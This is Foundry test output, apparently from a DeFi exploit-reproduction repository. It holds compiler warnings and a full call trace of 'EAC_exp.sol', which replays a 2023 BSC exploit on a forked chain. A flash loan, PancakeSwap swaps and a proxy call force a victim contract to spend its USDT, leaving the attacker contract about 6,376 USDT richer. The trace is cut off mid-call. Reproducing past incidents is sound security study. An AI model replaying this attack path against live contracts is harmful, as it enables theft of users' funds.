Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-08/EAC_exp.sol:37:9:
   |
37 |         proxy.call(abi.encodeWithSelector(0xe6a24c3f, IERC20(usdt).balanceOf(proxy)));
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/EAC_exp.sol:35:31:
   |
35 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/EAC_exp.sol:35:47:
   |
35 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/EAC_exp.sol:35:67:
   |
35 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/EAC_exp.sol:35:88:
   |
35 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 679.02ms (3.65ms CPU time)

Ran 1 test for src/test/2023-08/EAC_exp.sol:ContractTest
[PASS] testExploit() (gas: 584971)
Logs:
  Attacker USDT balance after exploit: 6376.857069483678926140

Traces:
  [6544] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 31273018 [3.127e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDT: [0x55d398326f99059fF775485246999027B3197955], "USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(EAC: [0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E], "EAC")
    │   └─ ← [Return]
    ├─ [0] VM::label(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PANCAKE_ROUTER_V2")
    │   └─ ← [Return]
    ├─ [0] VM::label(DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], "DODOPool")
    │   └─ ← [Return]
    └─ ← [Stop]

  [700171] ContractTest::testExploit()
    ├─ [695889] DODOPool::flashLoan(0, 300000000000000008388608 [3e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [12871] USDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 300000000000000008388608 [3e23])
    │   │   ├─ emit Transfer(from: DODOPool: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 300000000000000008388608 [3e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x000000000000000000000000000000000000000000003f87087b2ad353c10000
    │   │   │   @ 0xf293ac4f2016c12f970d35cabe52ede86e940214b15208a1107f43cb9557cf4a: 0x00000000000000000000000000000000000000000000a68bfde0537b3e8060a7 → 0x000000000000000000000000000000000000000000006704f588af9a5a8060a7
    │   │   └─ ← [Return] true
    │   ├─ [654181] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 300000000000000008388608 [3e23], 0x00)
    │   │   ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 300000010000000008388608 [3e23]
    │   │   ├─ [24562] USDT::approve(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [272019] PANCAKE_ROUTER_V2::swapExactTokensForTokensSupportingFeeOnTransferTokens(300000010000000008388608 [3e23], 0, [0x55d398326f99059fF775485246999027B3197955, 0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1693304711 [1.693e9])
    │   │   │   ├─ [10834] USDT::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, 300000010000000008388608 [3e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, value: 300000010000000008388608 [3e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640563739457574007913121251327 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffc078f784d52cac3effff
    │   │   │   │   │   @ 0x617a5d0143043648e66ecb374849afb258c90bd49ef3e62bc8c27ad2320ea1f0: 0x000000000000000000000000000000000000000000001da4837d026dcc8989d4 → 0x000000000000000000000000000000000000000000005d2b8bf82d41204a89d4
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000003f87087b2ad353c10000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2952] EAC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 139983368763169741310420 [1.399e23], 3511794965051261266932 [3.511e21], 1693303231 [1.693e9]
    │   │   │   ├─ [531] USDT::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   └─ ← [Return] 439983378763169749699028 [4.399e23]
    │   │   │   ├─ [241715] 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c::swap(0, 2392588380557017627068 [2.392e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [206920] EAC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2392588380557017627068 [2.392e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, to: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, value: 71777651416710528812 [7.177e19])
    │   │   │   │   │   ├─ [152852] 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971::aeb5957d()
    │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 71787651416710528812 [7.178e19]
    │   │   │   │   │   │   ├─ [25302] EAC::approve(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 71787651416710528812 [7.178e19])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 71787651416710528812 [7.178e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0 → 0x000000000000000000000000000000000000000000000003e440f89dc0993f2c
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [115780] PANCAKE_ROUTER_V2::swapExactTokensForTokensSupportingFeeOnTransferTokens(71787651416710528812 [7.178e19], 0, [0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E, 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08], 0x000000000000000000000000000000000000dEaD, 1693303711 [1.693e9])
    │   │   │   │   │   │   │   ├─ [23804] EAC::transferFrom(0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, 71787651416710528812 [7.178e19])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 0)
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, to: 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, value: 71777651416710528812 [7.177e19])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xff709fe6d6b07f9ae356fd0623922201cbee590f0244353f9a6c0236c15c0ad3: 0x00000000000000000000000000000000000000000008dc805ef8d822f1db5c99 → 0x00000000000000000000000000000000000000000008dc84431649ce42b39bc5
    │   │   │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0x000000000000000000000000000000000000000000000003e440f89dc0993f2c → 0
    │   │   │   │   │   │   │   │   │   @ 0x79d9c90da8c3a4dab4a824f72019ecd1df9e7c26c3d02061e35b5356e9517fc4: 0x000000000000000000000000000000000000000000000003e440f89dc0993f2c → 0x000000000000000000000000000000000000000000000000002386f26fc10000
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [2930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 131680662684380762261317 [1.316e23]
    │   │   │   │   │   │   │   ├─ [2893] 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 10712695209847068554910873 [1.071e25], 524868295442365811115245031 [5.248e26], 1693303231 [1.693e9]
    │   │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 10712766987498485265439685 [1.071e25]
    │   │   │   │   │   │   │   ├─ [72129] 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA::swap(0, 3507929341635271249830 [3.507e21], 0x000000000000000000000000000000000000dEaD, 0x)
    │   │   │   │   │   │   │   │   ├─ [36935] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::transfer(0x000000000000000000000000000000000000dEaD, 3507929341635271249830 [3.507e21])
    │   │   │   │   │   │   │   │   │   ├─ [2867] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::tradeMapping(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   ├─ [2867] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::tradeMapping(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   ├─ [8127] 0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7::sell()
    │   │   │   │   │   │   │   │   │   │   ├─ [2930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0xFF69f0CcDFaDD7E0353CDe9bE0b844D5b2008Cd7) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, to: 0x000000000000000000000000000000000000dEaD, value: 3507929341635271249830 [3.507e21])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x000000000000000000000000000000000000000000001be26c4b8d647708c745 → 0x000000000000000000000000000000000000000000001ca096981bcdb34796eb
    │   │   │   │   │   │   │   │   │   │   @ 0xff709fe6d6b07f9ae356fd0623922201cbee590f0244353f9a6c0236c15c0ad3: 0x000000000000000000000000000000000000000001b2292f4f32cbaecf093de7 → 0x000000000000000000000000000000000000000001b2287124e63d4592ca6e41
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 10712766987498485265439685 [1.071e25]
    │   │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 524864787513024175843995201 [5.248e26]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 10712766987498485265439685 [1.071e25], reserve1: 524864787513024175843995201 [5.248e26])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 71777651416710528812 [7.177e19], amount1In: 0, amount0Out: 0, amount1Out: 3507929341635271249830 [3.507e21], to: 0x000000000000000000000000000000000000dEaD)
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000031e6555fcd6ef5edbe69e569af02ab07886a → 0x000000000000000000000000000031e6b13d64aa95455f21b8b672a061abc86a
    │   │   │   │   │   │   │   │   │   @ 8: 0x64edc1bf000001b2292f4f32cbaecf093de700000008dc805ef8d822f1db5c99 → 0x64edc39f000001b2287124e63d4592ca6e4100000008dc84431649ce42b39bc5
    │   │   │   │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000055194d5ebbe1e2fe77fef43f71694b1b0 → 0x00000000000000000000000000000005519ea1eed10c8ac0bf7b335d1133ce70
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 135188592026016033511147 [1.351e23]
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0 → 0x000000000000000000000000000000000000000000000003e440f89dc0993f2c
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Transfer(from: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2320810729140307098256 [2.32e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x79d9c90da8c3a4dab4a824f72019ecd1df9e7c26c3d02061e35b5356e9517fc4: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x000000000000000000000000000000000000000000000003e440f89dc0993f2c
    │   │   │   │   │   │   @ 0xaadcf068a771e60c74516571db1fbf6e6c3d092d6857fd1c133eb61585622a17: 0x0000000000000000000000000000000000000000000000be5ff2026d4dc32bf4 → 0x00000000000000000000000000000000000000000000003cac1c8ac9719af238
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000007dcfb805f88b4ffa90
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 439983378763169749699028 [4.399e23]
    │   │   │   │   ├─ [952] EAC::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1119206584494243639864 [1.119e21]
    │   │   │   │   ├─ emit Sync(reserve0: 439983378763169749699028 [4.399e23], reserve1: 1119206584494243639864 [1.119e21])
    │   │   │   │   ├─ emit Swap(sender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 300000010000000008388608 [3e23], amount1In: 0, amount0Out: 0, amount1Out: 2392588380557017627068 [2.392e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x000000000000000000000000000010132d21547febf1aa719479ea46219a8de7 → 0x0000000000000000000000000000101377de920542e29497bb99063e17790587
    │   │   │   │   │   @ 8: 0x64edc1bf0000000000be5ff2026d4dc32bf4000000001da4837d026dcc8989d4 → 0x64edc39f00000000003cac1c8ac9719af238000000005d2b8bf82d41204a89d4
    │   │   │   │   │   @ 9: 0x00000000000000000000000000000025711bb535612e62e195cb970f00fb81d7 → 0x000000000000000000000000000000257127bfed65bcacab83b77d0b8335bb37
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [952] EAC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 2320810729140307098256 [2.32e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2531] USDT::balanceOf(0xa08a40e0F11090Dcb09967973DF82040bFf63561) [staticcall]
    │   │   │   └─ ← [Return] 14300000000000000000000 [1.43e22]
    │   │   ├─ [173392] 0xa08a40e0F11090Dcb09967973DF82040bFf63561::e6a24c3f(000000000000000000000000000000000000000000000307345d9b5a55f00000)
    │   │   │   ├─ [166076] 0xb803eD66aB449D80Ed12Cacf83eaE5147fDC6922::e6a24c3f(000000000000000000000000000000000000000000000307345d9b5a55f00000) [delegatecall]
    │   │   │   │   ├─ [531] USDT::balanceOf(0xa08a40e0F11090Dcb09967973DF82040bFf63561) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14300000000000000000000 [1.43e22]
    │   │   │   │   ├─ [24562] USDT::approve(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 14300000000000000000000 [1.43e22])
    │   │   │   │   │   ├─ emit Approval(owner: 0xa08a40e0F11090Dcb09967973DF82040bFf63561, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 14300000000000000000000 [1.43e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8b0b34a73ff4e31e3033a52c5cd13db15f7cfeabd8ac571585f0565d45744ea6: 0 → 0x000000000000000000000000000000000000000000000307345d9b5a55f00000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [132051] PANCAKE_ROUTER_V2::swapExactTokensForTokensSupportingFeeOnTransferTokens(14300000000000000000000 [1.43e22], 0, [0x55d398326f99059fF775485246999027B3197955, 0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E], 0x279B8306bB7CD010eEDF1227536464A31d6afeA1, 1693303711 [1.693e9])
    │   │   │   │   │   ├─ [8834] USDT::transferFrom(0xa08a40e0F11090Dcb09967973DF82040bFf63561, 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, 14300000000000000000000 [1.43e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xa08a40e0F11090Dcb09967973DF82040bFf63561, to: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, value: 14300000000000000000000 [1.43e22])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0xa08a40e0F11090Dcb09967973DF82040bFf63561, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 0)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x617a5d0143043648e66ecb374849afb258c90bd49ef3e62bc8c27ad2320ea1f0: 0x000000000000000000000000000000000000000000005d2b8bf82d41204a89d4 → 0x000000000000000000000000000000000000000000006032c055c89b763a89d4
    │   │   │   │   │   │   │   @ 0x8b0b34a73ff4e31e3033a52c5cd13db15f7cfeabd8ac571585f0565d45744ea6: 0x000000000000000000000000000000000000000000000307345d9b5a55f00000 → 0
    │   │   │   │   │   │   │   @ 0xdc07bda862148a7ccc2053f36c9d536e867ca4c95c4738ce85c07930c856a781: 0x000000000000000000000000000000000000000000000307345d9b5a55f00000 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [2952] EAC::balanceOf(0x279B8306bB7CD010eEDF1227536464A31d6afeA1) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 5001519616667225776580426 [5.001e24]
    │   │   │   │   │   ├─ [893] 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 439983378763169749699028 [4.399e23], 1119206584494243639864 [1.119e21], 1693303711 [1.693e9]
    │   │   │   │   │   ├─ [531] USDT::balanceOf(0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 454283378763169749699028 [4.542e23]
    │   │   │   │   │   ├─ [110747] 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c::swap(0, 35145241300082759780 [3.514e19], 0x279B8306bB7CD010eEDF1227536464A31d6afeA1, 0x)
    │   │   │   │   │   │   ├─ [95236] EAC::transfer(0x279B8306bB7CD010eEDF1227536464A31d6afeA1, 35145241300082759780 [3.514e19])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x6901c75C9A0B18687bD6f5764fE7fdD1dbCc316c, to: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, value: 1054357239002482793 [1.054e18])
    │   │   │   │   │   │   │   ├─ [75568] 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971::aeb5957d()
    │   │   │   │   │   │   │   │   ├─ [952] EAC::balanceOf(0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 1064357239002482793 [1.064e18]
    │   │   │   │   │   │   │   │   ├─ [23202] EAC::approve(PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 1064357239002482793 [1.064e18])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 1064357239002482793 [1.064e18])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0 → 0x0000000000000000000000000000000000000000000000000ec55b4508dbc869
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [46596] PANCAKE_ROUTER_V2::swapExactTokensForTokensSupportingFeeOnTransferTokens(1064357239002482793 [1.064e18], 0, [0x64f291DE10eCd36D5f7b64aaEbC70943CFACE28E, 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08], 0x000000000000000000000000000000000000dEaD, 1693303711 [1.693e9])
    │   │   │   │   │   │   │   │   │   ├─ [9004] EAC::transferFrom(0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, 1064357239002482793 [1.064e18])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, spender: PANCAKE_ROUTER_V2: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 0)
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x7C8F0F09f1605237D3A5160E78B04cCCec6D7971, to: 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA, value: 1054357239002482793 [1.054e18])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x8015483b0e6065217f47f421ae65f14d9869466a3ca4af39af29f6ff478e296a: 0x0000000000000000000000000000000000000000000000000ec55b4508dbc869 → 0
    │   │   │   │   │   │   │   │   │   │   │   @ 0x79d9c90da8c3a4dab4a824f72019ecd1df9e7c26c3d02061e35b5356e9517fc4: 0x0000000000000000000000000000000000000000000000000ec55b4508dbc869 → 0x000000000000000000000000000000000000000000000000002386f26fc10000
    │   │   │   │   │   │   │   │   │   │   │   @ 0xff709fe6d6b07f9ae356fd0623922201cbee590f0244353f9a6c0236c15c0ad3: 0x00000000000000000000000000000000000000000008dc84431649ce42b39bc5 → 0x00000000000000000000000000000000000000000008dc8451b81e20dbce642e
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   ├─ [930] 0x89E75E1fCF32b8d2b6c7d3A40C5BbF8fDDb93B08::balanceOf(0x000000000000000000000000000000000000dEaD) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 135188592026016033511147 [1.351e23]
    │   │   │   │   │   │   │   │   │   ├─ [893] 0xa0FFe0603E1329948E4623f5E9965C6E866Fb4CA::getReserves() [staticcall]
